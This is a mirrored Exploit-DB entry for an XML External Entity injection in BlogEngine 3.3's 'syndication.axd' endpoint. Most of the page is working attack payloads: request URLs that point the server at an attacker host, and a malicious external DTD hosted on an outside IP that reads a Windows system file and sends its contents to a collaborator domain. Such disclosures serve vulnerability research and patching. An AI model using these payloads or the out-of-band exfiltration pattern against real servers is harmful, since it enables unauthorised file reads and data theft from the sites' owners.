bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/xml/webapps/48422.txt
Offensive Security cc95715dc2 DB: 2020-05-06 
10 changes to exploits/shellcodes

Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path

Saltstack 3000.1 - Remote Code Execution

BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection
Fishing Reservation System 7.5 - 'uid' SQL Injection
Online Scheduling System 1.0 - 'username' SQL Injection
webERP 4.15.1 - Unauthenticated Backup File Access
PhreeBooks ERP 5.2.5 - Remote Command Execution
SimplePHPGal 0.7 - Remote File Inclusion
NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration
2020-05-06 05:01:49 +00:00

61 lines
No EOL
1.7 KiB
Text
Raw Blame History

# Title: BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection
# Author: Daniel Martinez Adan (aDoN90)
# Date: 2020-05-01
# Homepage: https://blogengine.io/
# Software Link: https://blogengine.io/support/download/
# Affected Versions: 3.3
# Vulnerability: XML External Entity (XXE OOB) Injection Vulnerability
# Severity: High
# Status: Fixed
# Author: Daniel Martinez Adan (aDoN90)
# CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H
Technical Details
--------------------
Url: http://websiteurl-blogengine3.3/syndication.axd
Parameter Name: apml
Parameter Type: GET
*Attack Pattern 1 (SSRF HTTP Interaction) :*
http://websiteurl-blogengine3.3/syndication.axd?apml=http://hav4zt9bu9ihxzvcg59lqfapzg5it7.burpcollaborator.net
*Attack Pattern 2 (SSRF to XXE HTTP Interaction):*
http://b5baa301-b569-4bbf-afd9-d2eb264fdcbf.gdsdemo.com/blog/syndication.axd?apml=http://attackerip:8000/miau.txt
miau.txt
-----------------------------
<!DOCTYPE foo SYSTEM "
">http://dgx2pxtwxkvgvkubo7ksvkywtnzhn6.burpcollaborator.net">
<http://dgx2pxtwxkvgvkubo7ksvkywtnzhn6.burpcollaborator.net>
-----------------------------
[image: image.png]
*Attack Pattern 3 (SSRF to XXE Exfiltration):*
miau.txt
-----------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://37.187.112.19:8000/test1.dtd">
%sp;
%param1;
%exfil;
]>
-----------------------------
test1.dtd
-----------------------------
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM '
http://y76a7hgbrccuyclwxwcp3br74yayyn.burpcollaborator.net/?%data;'>">
-----------------------------
Reference in a new issue View git blame Copy permalink